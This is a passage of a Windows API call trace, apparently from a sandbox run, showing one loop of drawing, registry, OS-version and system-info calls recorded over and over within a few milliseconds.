returned 0xffffffff [0092.305] BeginPath (hdc=0x0) returned 0 [0092.305] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.305] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.305] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.305] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.305] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.305] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.306] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.306] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.306] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.306] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.306] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.306] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.306] BeginPath (hdc=0x0) returned 0 [0092.306] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.306] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.306] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.306] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.306] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.306] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.306] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.306] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.306] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.306] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.306] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.306] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.306] BeginPath (hdc=0x0) returned 0 [0092.306] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.306] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.306] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.306] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.306] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.306] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.306] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.307] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.307] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.307] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.307] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.307] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.307] BeginPath (hdc=0x0) returned 0 [0092.307] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.307] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.307] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.307] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.307] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.307] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.307] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.307] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.307] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.307] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.307] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.307] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.307] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.307] BeginPath (hdc=0x0) returned 0 [0092.307] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.307] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.307] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.307] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.307] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.307] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.307] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.307] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.308] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.308] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.308] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.308] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.308] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.308] BeginPath (hdc=0x0) returned 0 [0092.308] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.308] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.308] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.308] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.308] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.308] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.308] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.308] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.308] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.308] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.308] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.309] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.309] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.309] BeginPath (hdc=0x0) returned 0 [0092.309] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.309] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.309] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.309] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.309] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.309] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.309] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.309] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.309] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.309] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.309] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.309] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.309] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.309] BeginPath (hdc=0x0) returned 0 [0092.309] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.309] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.309] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.309] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.309] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.309] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.309] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.309] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.309] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.309] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.309] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.310] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.310] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.310] BeginPath (hdc=0x0) returned 0 [0092.310] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.310] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.310] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.310] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.310] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.310] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.310] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.310] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.310] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.310] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.310] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.310] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.310] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.310] BeginPath (hdc=0x0) returned 0 [0092.310] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.310] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.310] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.310] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.310] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.310] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.310] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.310] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.310] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.310] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.311] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.311] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.311] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.311] BeginPath (hdc=0x0) returned 0 [0092.311] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.311] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.311] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.311] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.311] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.311] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.311] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.311] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.311] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.311] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.311] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.311] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.311] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.311] BeginPath (hdc=0x0) returned 0 [0092.311] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.311] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.311] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.311] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.311] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.311] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.311] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.311] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.311] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.311] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.312] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.312] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.312] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.312] BeginPath (hdc=0x0) returned 0 [0092.312] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.312] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.312] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.312] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.312] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.312] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.312] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.312] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.312] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.312] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.312] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.312] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.312] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.312] BeginPath (hdc=0x0) returned 0 [0092.312] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.312] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.312] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.312] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.312] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.312] GetWindowRect 